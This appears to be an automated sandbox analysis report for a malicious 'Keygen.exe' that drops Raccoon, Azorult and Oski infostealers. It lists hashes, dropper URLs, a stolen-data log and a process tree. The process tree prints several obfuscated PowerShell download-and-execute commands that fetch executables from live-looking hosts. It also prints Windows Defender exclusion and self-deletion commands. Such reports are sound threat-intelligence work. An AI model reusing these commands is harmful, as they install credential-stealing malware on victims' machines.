Overview

overview

10

Static

static

Keygen.exe

windows7_x64

10

Keygen.exe

windows10_x64

10

Resubmissions

14-03-2021 10:17

210314-fsh5gvfbqx 10

31-10-2020 16:07

201031-jhx64f88en 10

01-10-2020 20:46

201001-nyhbt4p25j 10

01-10-2020 20:45

201001-c3xkyk1ytn 10

01-10-2020 20:43

201001-j5wlprfb6a 10

23-09-2020 09:23

200923-31plnbj8kx 10

07-09-2020 15:39

200907-ttv28yxx3e 10

07-09-2020 15:39

200907-n38qzysfy6 10

07-09-2020 15:38

200907-9llegynkjx 10

07-09-2020 15:31

200907-3xqj79j9gx 10

Analysis

  • max time kernel
    68s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    07-09-2020 15:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Keygen.exe

  • Size

    849KB

  • MD5

    dbde61502c5c0e17ebc6919f361c32b9

  • SHA1

    189749cf0b66a9f560b68861f98c22cdbcafc566

  • SHA256

    88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b

  • SHA512

    d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb

Score
10/10
azorultoskiraccoondiscoveryevasioninfostealerransomwarespywarestealertrojan

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe
exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe
exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT
exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv
exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe
exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD
exe.dropper

http://bit.do/fqhJD

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:03 2020 Launched at: 2020.09.07 - 17:37:08 GMT Bot_ID: 18823CA4-5761-4226-8787-CF36135F1C68_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: LZUKLIOU - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (769 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

    infostealeroski
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Keygen.exe
    "C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\766E.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3668
      • C:\Users\Admin\AppData\Local\Temp\766E.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:3856
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3384
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4064
          • C:\Users\Public\kzv.exe
            "C:\Users\Public\kzv.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4772
            • C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe
              "C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4956
              • C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe
                "C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:4220
            • C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe
              "C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4996
              • C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe
                "C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:4396
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4396 & erase C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe & RD /S /Q C:\\ProgramData\\703026737453063\\* & exit
                  8⤵
                    PID:4840
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4396
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4644
              • C:\Users\Public\kzv.exe
                "C:\Users\Public\kzv.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:4248
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:496
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3944
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:3080
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3104
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1432
            • C:\Users\Public\bot.exe
              "C:\Users\Public\bot.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:5072
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3864
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3952
        • C:\Windows\SysWOW64\timeout.exe
          timeout 2
          3⤵
          • Delays execution with timeout.exe
          PID:968
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3784
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3204
            • C:\Users\Public\xsn.exe
              "C:\Users\Public\xsn.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4764
              • C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe
                "C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:4980
                • C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:4404
              • C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe
                "C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:5016
                • C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe
                  "C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Checks processor information in registry
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4408
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 4408 & erase C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe & RD /S /Q C:\\ProgramData\\703026737453063\\* & exit
                    8⤵
                      PID:4724
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /pid 4408
                        9⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4660
                • C:\Users\Public\xsn.exe
                  "C:\Users\Public\xsn.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops desktop.ini file(s)
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4224
                  • C:\Users\Admin\AppData\Local\Temp\RfuDZIiMnF.exe
                    "C:\Users\Admin\AppData\Local\Temp\RfuDZIiMnF.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5024
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                      "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\RfuDZIiMnF.exe"'
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4192
                  • C:\Users\Admin\AppData\Local\Temp\ruY2MTTTCi.exe
                    "C:\Users\Admin\AppData\Local\Temp\ruY2MTTTCi.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:1392
                  • C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe
                    "C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4200
                    • C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe
                      "C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1320
                      • \??\c:\windows\SysWOW64\cmstp.exe
                        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\woblbiuz.inf
                        9⤵
                          PID:5108
                    • C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe
                      "C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3116
                      • C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe
                        "C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe"
                        8⤵
                        • Executes dropped EXE
                        • Windows security modification
                        PID:4960
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" Get-MpPreference -verbose
                          9⤵
                            PID:4388
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xsn.exe"
                        7⤵
                          PID:3824
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /T 10 /NOBREAK
                            8⤵
                            • Delays execution with timeout.exe
                            PID:1240
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:688
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2116
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
              1⤵
              • Drops file in Windows directory
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              PID:1060
            • C:\Windows\SysWOW64\DllHost.exe
              C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              1⤵
                PID:4308

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\703026737453063\_7030267374.zip
                Download Submit

              • C:\ProgramData\703026737453063\passwords.txt
                Download Submit

              • C:\ProgramData\703026737453063\passwords.txt
                Download Submit

              • C:\ProgramData\703026737453063\system.txt
                Download Submit

              • C:\ProgramData\703026737453063\temp
                Download Submit

              • C:\ProgramData\freebl3.dll
                Download Submit

              • C:\ProgramData\mozglue.dll
                Download Submit

              • C:\ProgramData\mozglue.dll
                Download Submit

              • C:\ProgramData\msvcp140.dll
                Download Submit

              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                Download Submit

              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                Download Submit

              • C:\ProgramData\softokn3.dll
                Download Submit

              • C:\ProgramData\sqlite3.dll
                Download Submit

              • C:\ProgramData\sqlite3.dll
                Download Submit

              • C:\ProgramData\vcruntime140.dll
                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Download Submit

